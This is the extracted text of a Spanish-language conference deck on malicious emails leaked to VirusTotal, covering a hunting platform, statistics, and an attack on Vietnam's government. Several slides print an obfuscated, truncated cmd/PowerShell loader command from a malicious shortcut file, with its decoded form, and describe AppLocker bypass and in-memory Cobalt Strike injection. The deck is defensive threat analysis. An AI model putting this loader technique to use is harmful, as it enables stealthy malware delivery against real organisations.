SlideShare uma empresa Scribd logo
1 de 60
Baixar para ler offline
1RootedCON 2019
An Other Bad Email
/RootedCON Madrid 2019
2RootedCON 2019
¿Quienes somos?
Miguel Ángel de Castro
Senior Cyberthreats Analyst en ElevenPaths (Telefónica)
Pablo San Emeterio
Innovation Analyst & CSA ElevenPaths (Telefónica)
3RootedCON 2019
email
Email! Email! Email!
4RootedCON 2019
Emails en Fuente abierta… fuga de datos….
From emails
To emails
Subjects
Adjuntos
Body:(passwords,contexto,
INFORMACIÓN….)
Etc…..
……
5RootedCON 2019
---DISCLAIMER--- The contents of this E-mail (including the contents of the enclosure/(s) or attachment/(s)
if any) are privileged and confidential material of Mahindra and Mahindra Limited
and should not be disclosed to, used by or copied in any manner by anyone other than the intended
addressee/(s).
If this E-mail (including the enclosure/(s) or attachment/(s) if any ) has been received in error, please advise
the sender immediately and
delete it from your system. The views expressed in this E-mail message (including the enclosure/(s) or
attachment/(s) if any) are those of the individual sender.
Emails en Fuente abierta… fuga de datos…
6RootedCON 2019
Malware Banco Pakistan
7RootedCON 2019
El origen… Bancos Pakistan
YARA
8RootedCON 2019
Malware Banco Pakistan
Description:
Adwind es un RAT basado en Java que se instala silenciosamente y se conecta a un
sitio remoto a través de un puerto preconfigurado para recibir comandos del
atacante remoto. Cuando está activo, es capaz de robar información de usuario y
también puede utilizarse para distribuir otro malware.
9RootedCON 2019
MAIL MINCER
10RootedCON 2019
MAIL MINCER: Arquitectura
PLATAFORMA DE HUNTING EN
SISTEMA DATA ANALITYC
PROCESAMIENTO
ML: DIARIO
SANDBOX: WILDFIRE
PALOALTO
AV: VIRUSTOTAL
Cabeceras
Adjuntos
Contenido
Etc…
• Tecnología interna.
• Permite analizar documentos ofimáticos y PDF
• Sin necesidad de subir el archivo completo.
Analiza protegiendo la privacidad.
• No utiliza tecnología antivirus, sino un sistema de
predicción propio basado en Machine Learning
• Permite para el analista bucear por los datos de
todos esos documentos, sin conocer su contenido
ni quién lo subió, solo los datos relevantes para
una investigación
11RootedCON 2019
MAIL MINCER: Tabla resultados
12RootedCON 2019
MAIL MINCER: Dashboard
13RootedCON 2019
MAIL MINCER: Dashboard
14RootedCON 2019
DIARIO
15RootedCON 2019
DIARIO
16RootedCON 2019
DIARIO
17RootedCON 2019
DIARIO
Quien esté interesado en acceder al panel o la API, que se
dirija a diario.e-paths.com y que escriba a labs@11paths.com
identificándose como RootedXEdition.
18RootedCON 2019
ANÁLISIS ESTADÍSTICO
19RootedCON 2019
Tipos de ficheros País primer envío a VT
Resultados estadisticos (4 meses)
Elementos procesados
21RootedCON 2019
Top 30 de adjunto 1 Top 30 de adjunto 2
Top 30 de asuntos
Resultados estadisticos (4 meses)
Elementos procesados
22RootedCON 2019
Top 20 From emails
Resultados estadisticos (4 meses)
Elementos procesados
23RootedCON 2019
Bottom 20 From emails solo 1 email
Resultados estadisticos (4 meses)
Elementos procesados
24RootedCON 2019
Top 20 To emails
Resultados estadisticos (4 meses)
Elementos procesados
25RootedCON 2019
Bottom 20 To emails solo 1 email
Resultados estadisticos (4 meses)
Elementos procesados
26RootedCON 2019
Top 25 From: dominios .es
Resultados estadisticos (4 meses)
Elementos procesados
Banca
Alimentación
Construcción
Marketing
Industrial
Alimentación
LimpiezaBanca
Banca
Industrial
Logística
Universidad
Servicios
Industrial
Industrial
Alimentación
Servicios
Empresarial
Universidad
27RootedCON 2019
Top 25 To: dominios .es
Resultados estadisticos (4 meses)
Elementos procesados
Consultoría
Consultoría
Transportes
Gestión
Telco
Informática
Logística
Construcción
Automoción
Limpieza
Industrial
Ciberseguridad
Servicios
28RootedCON 2019
SECTORES
29RootedCON 2019
Resultados estadisticos: Sector Banca
Distribución por paísesTOP de usuarios de VT que suben emails
30RootedCON 2019
Resultados estadisticos: Sector Banca
31RootedCON 2019
Resultados estadisticos: Sector Banca
32RootedCON 2019
Resultados estadisticos: Sector Telco
Distribución por paísesTOP de usuarios de VT que suben emails
33RootedCON 2019
Resultados estadisticos: Sector Telco
34RootedCON 2019
Resultados estadisticos: Sector Telco
35RootedCON 2019
Resultados estadisticos: cuentas “publicas”
Distribución por paísesTOP de usuarios de VT que suben emails
36RootedCON 2019
Resultados estadisticos: cuentas “publicas”
DOMINIOS RECEPTORES DE EMAILS DOMINIOS ENVIADORES DE EMAILS
37RootedCON 2019
Resultados estadisticos: cuentas “publicas”
38RootedCON 2019
GOBIERNOS
39RootedCON 2019
Análisis .gov
DOMINIOS .GOV RECEPTORES DE EMAIL
CUENTAS QUE ENVIAN EMAIL A DOMINIOS .GOV
Total: 531 emails
270
44
40RootedCON 2019
Análisis .gov
Total: 531 emails
270
PAISES QUE MANDAN A FUENTE PUBLICA EMAILS .GOV
184
142
CUENTAS VT QUE MANDAN A FUENTE PUBLICA EMAILS .GOV
207
153
44
41RootedCON 2019
Análisis .gov Total: 531 emails
0 DETECCIONES EN VIRUSTOTAL
270
DETECCIONES EN VIRUSTOTAL > 1
180
241
82
NUMERO POSITIVOS EN VIRUSTOTALTIPOS DE FICHERO EN ADJUNTOS
64
5
12
6
42RootedCON 2019
Análisis .gov JUNTAMOS TODAS LAS ANALÍTICAS
43RootedCON 2019
184
142 207
APARECEN LAS SINGULARIDADES!!Análisis .gov
44RootedCON 2019
142 207
Ataque sofisticado al gobierno de Vietnam
45RootedCON 2019
184
142 207
%comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam
2019.doc.lnk">%temp%%windir:~-
1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec
bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~-
1,1%.ps1&for /f "delims==" %i in ('dir "%temp
DOS FUSCATION + FILE CARVING + FILESS POWERSHELL + AppLocker Bypass + Cobalt
.net inyecta en memoria cobalt
Intalador legitimo .net para
AppLocker Bypass
Decoy file
Ataque sofisticado al gobierno de Vietnam
46RootedCON 2019
184
142
207
%comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam
2019.doc.lnk">%temp%%windir:~-
1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec
bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~-
1,1%.ps1&for /f "delims==" %i in ('dir "%temp
C:Windowssystem32cmd.exe /c findstring /b /i "iex"
C:UsersAdminDesktopattachment_toolTKCT quy I nam 2019.doc.lnk
powershell.exe bypass -file C:UsersAdminAppDataLocalTemps.ps1
DOS OFUSCATION DECODIFICADO
FILE CARVING
Ataque sofisticado al gobierno de Vietnam
47RootedCON 2019
184
142 207
%comspec% /c f%windir:~4,1%ndstr /b /i "iex" "%cd%TKCT quy I nam
2019.doc.lnk">%temp%%windir:~-
1,1%.ps1|p%ProgramFiles:~5,1%wer%windir:~-1,1%hell.exe -exec
bypa%windir:~-1,1%%windir:~-1,1% -file %temp%%windir:~-
1,1%.ps1&for /f "delims==" %i in ('dir "%temp
Ataque sofisticado al gobierno de Vietnam
48RootedCON 2019
184
142 207
.net inyecta en memoria cobalt
Intalador legitimo .net para
AppLocker Bypass
Decoy file
Ataque sofisticado al gobierno de Vietnam
49RootedCON 2019
184
Ataque sofisticado al gobierno de Vietnam
50RootedCON 2019
184
207
Ataque sofisticado al gobierno de Vietnam
51RootedCON 2019
184
Instalador legitimo .net para AppLocker
Bypass que carga el binario compilado .NET
Ataque sofisticado al gobierno de Vietnam
52RootedCON 2019
184
142 207
Ataque sofisticado al gobierno de Vietnam
.NET inyecta en memoria cobalt
53RootedCON 2019
184
142 207
.NET inyecta en memoria cobalt
Ataque sofisticado al gobierno de Vietnam
54RootedCON 2019
142 207
.NET inyecta en
memoria cobalt
Ataque sofisticado al gobierno de Vietnam
55RootedCON 2019
184
142 207
Ataque sofisticado al gobierno de Vietnam
COBALT
56RootedCON 2019
184
142 207
Ataque sofisticado al gobierno de Vietnam
57RootedCON 2019
CONCLUSIONES
58RootedCON 2019
184
142 207
• EL EMAIL ES UNO DE LOS PRINCIPALES VECTORES DE ENTRADA A UNA ORGANIZACIÓN, LOS CONTROLES
PREVIOS NO SON SUFICIENTEMENTE EFECTIVOS.
• EXISTEN MUCHOS CORREOS ACCESIBLES EN FUENTE ABIERTA ACCESIBLES PARA CUALQUIERA, ESTO
PERMITEACCEDER A INFORMACIÓN SENSIBLE DE UNA ORGANIZACIÓN Y REALIZAR PERFILADO DE LA MISMA.
• LA VARIEDAD DE MALWARE ENCONTRADO ES AMPLIA, CON MUCHA PRESENCIA DE EMOTET
• LAS TÉCNICAS MAS INTERESANTES ENCONTRADAS PARA EVITAR LA DETECCIÓN POR AV, SANDBOX O ML
SON:
• ADJUNTOS COMPRIMIDOS CON UNA PASSWORD PRESENTE EN EL PROPIO EMAIL
• FILESS MEDIANTE POWERSHELL
• DOS-FUSCATION
• EXPLOITS EN DOCUMENTOS OFIMÁTICOS Y PDF
• APPLOCKER BYPASS
• LOS ATACANTES DEDICAN MÁS ESFUERZO AL DESPLIEGUE DEL MALWARE PARA NO SER DETECTADOS QUE
AL DESARROLLO DE NUEVAS PIEZAS DE MALWARE´
Analisis .gov
59RootedCON 2019
184
142 207
Agradecimientos
60RootedCON 2019
Q&A
61RootedCON 2019
Muchas gracias

Mais conteúdo relacionado

Semelhante a Miguel Ángel de Castro & Pablo San Emeterio - Another Bad Email :-( [rooted2019]

Instructivo - PTE - Fase 1.pdf
Instructivo - PTE - Fase 1.pdfInstructivo - PTE - Fase 1.pdf
Instructivo - PTE - Fase 1.pdf
REdwinAparco
 
Control de inventario rancho j&n
Control de inventario rancho j&nControl de inventario rancho j&n
Control de inventario rancho j&n
luis villacis
 
Brandon trejo de la luz trabajo con la investigacion
Brandon trejo de la luz trabajo con la investigacionBrandon trejo de la luz trabajo con la investigacion
Brandon trejo de la luz trabajo con la investigacion
BrandonKennyTrejo
 
Costo de brechas Cibernéticas - Spanish 2020
Costo de brechas Cibernéticas - Spanish 2020Costo de brechas Cibernéticas - Spanish 2020
Costo de brechas Cibernéticas - Spanish 2020
bogotasur
 
Expo.Firma.Electronica
Expo.Firma.ElectronicaExpo.Firma.Electronica
Expo.Firma.Electronica
nidiablog
 

Semelhante a Miguel Ángel de Castro & Pablo San Emeterio - Another Bad Email :-( [rooted2019] (20)

ESTAFAS EN LA RED
ESTAFAS EN LA REDESTAFAS EN LA RED
ESTAFAS EN LA RED
 
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOCStay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
 
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOCStay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
Stay ahead of the Threats: Automate and Simplify SecOps to revolutionize the SOC
 
Instructivo - PTE - Fase 1.pdf
Instructivo - PTE - Fase 1.pdfInstructivo - PTE - Fase 1.pdf
Instructivo - PTE - Fase 1.pdf
 
frefrfrfr
frefrfrfrfrefrfrfr
frefrfrfr
 
Presentacion de NETConf.UY 2018
Presentacion de NETConf.UY 2018Presentacion de NETConf.UY 2018
Presentacion de NETConf.UY 2018
 
Control de inventario rancho j&n
Control de inventario rancho j&nControl de inventario rancho j&n
Control de inventario rancho j&n
 
Presentacion Fedesoft
Presentacion FedesoftPresentacion Fedesoft
Presentacion Fedesoft
 
20080506 Acm Dia Busqueda Empresarial V1
20080506 Acm Dia Busqueda Empresarial V120080506 Acm Dia Busqueda Empresarial V1
20080506 Acm Dia Busqueda Empresarial V1
 
facturacion electronica senati
facturacion electronica senatifacturacion electronica senati
facturacion electronica senati
 
Brandon trejo de la luz trabajo con la investigacion
Brandon trejo de la luz trabajo con la investigacionBrandon trejo de la luz trabajo con la investigacion
Brandon trejo de la luz trabajo con la investigacion
 
Costo de brechas Cibernéticas - Spanish 2020
Costo de brechas Cibernéticas - Spanish 2020Costo de brechas Cibernéticas - Spanish 2020
Costo de brechas Cibernéticas - Spanish 2020
 
Transformación Digital en un mercado único
Transformación Digital en un mercado únicoTransformación Digital en un mercado único
Transformación Digital en un mercado único
 
Conocimiento del cliente taller final
Conocimiento del cliente   taller finalConocimiento del cliente   taller final
Conocimiento del cliente taller final
 
Expo.Firma.Electronica
Expo.Firma.ElectronicaExpo.Firma.Electronica
Expo.Firma.Electronica
 
Monografía industria software en Argentina
Monografía industria software en ArgentinaMonografía industria software en Argentina
Monografía industria software en Argentina
 
Que es AS2 y como se implementa
Que es AS2 y como se implementaQue es AS2 y como se implementa
Que es AS2 y como se implementa
 
¿Qué le falta a tu crecimiento profesional?
¿Qué le falta a tu crecimiento profesional?¿Qué le falta a tu crecimiento profesional?
¿Qué le falta a tu crecimiento profesional?
 
aplicaciones-de-e-business-clase-01 (1).ppt
aplicaciones-de-e-business-clase-01 (1).pptaplicaciones-de-e-business-clase-01 (1).ppt
aplicaciones-de-e-business-clase-01 (1).ppt
 
Toma de decisiones en condiciones VUCA
Toma de decisiones en condiciones VUCAToma de decisiones en condiciones VUCA
Toma de decisiones en condiciones VUCA
 

Mais de RootedCON

Mais de RootedCON (20)

Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro VillaverdeRooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
Rooted2020 A clockwork pentester - Jose Carlos Moral & Alvaro Villaverde
 
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
rooted2020 Sandbox fingerprinting -_evadiendo_entornos_de_analisis_-_victor_c...
 
Rooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amadoRooted2020 hunting malware-using_process_behavior-roberto_amado
Rooted2020 hunting malware-using_process_behavior-roberto_amado
 
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
Rooted2020 compliance as-code_-_guillermo_obispo_-_jose_mariaperez_-_
 
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
Rooted2020 the day i_ruled_the_world_deceiving_software_developers_through_op...
 
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
Rooted2020 si la-empresa_ha_ocultado_el_ciberataque,_como_se_ha_enterado_el_r...
 
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
Rooted2020 wordpress-another_terror_story_-_manuel_garcia_-_jacinto_sergio_ca...
 
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguerRooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
Rooted2020 Atacando comunicaciones-de_voz_cifradas_-_jose_luis_verdeguer
 
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
rooted2020-Rootkit necurs no_es_un_bug,_es_una_feature_-_roberto_santos_-_jav...
 
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemyRooted2020 stefano maccaglia--_the_enemy_of_my_enemy
Rooted2020 stefano maccaglia--_the_enemy_of_my_enemy
 
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
Rooted2020 taller de-reversing_de_binarios_escritos_en_golang_-_mariano_palom...
 
Rooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molinaRooted2020 virtual pwned-network_-_manel_molina
Rooted2020 virtual pwned-network_-_manel_molina
 
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
Rooted2020 van a-mear_sangre_como_hacer_que_los_malos_lo_paguen_muy_caro_-_an...
 
Rooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopezRooted2020 todo a-siem_-_marta_lopez
Rooted2020 todo a-siem_-_marta_lopez
 
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valeroRooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
Rooted2020 roapt evil-mass_storage_-_tu-ya_aqui_-_david_reguera_-_abel_valero
 
Rooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jaraRooted2020 live coding--_jesus_jara
Rooted2020 live coding--_jesus_jara
 
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
Rooted2020 legalidad de-la_prueba_tecnologica_indiciaria_cuando_tu_papi_es_un...
 
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
Rooted2020 hackeando el-mundo_exterior_a_traves_de_bluetooth_low-energy_ble_-...
 
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yusteRooted2020 evading deep-learning_malware_detectors_-_javier_yuste
Rooted2020 evading deep-learning_malware_detectors_-_javier_yuste
 
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_moralesRooted2020 encontrando 0days-en_2020_-_antonio_morales
Rooted2020 encontrando 0days-en_2020_-_antonio_morales
 

Último

redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
nicho110
 

Último (12)

Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptx
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXI
 
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptxEL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
EL CICLO PRÁCTICO DE UN MOTOR DE CUATRO TIEMPOS.pptx
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
 
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxPROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
 
pruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNITpruebas unitarias unitarias en java con JUNIT
pruebas unitarias unitarias en java con JUNIT
 

Miguel Ángel de Castro & Pablo San Emeterio - Another Bad Email :-( [rooted2019]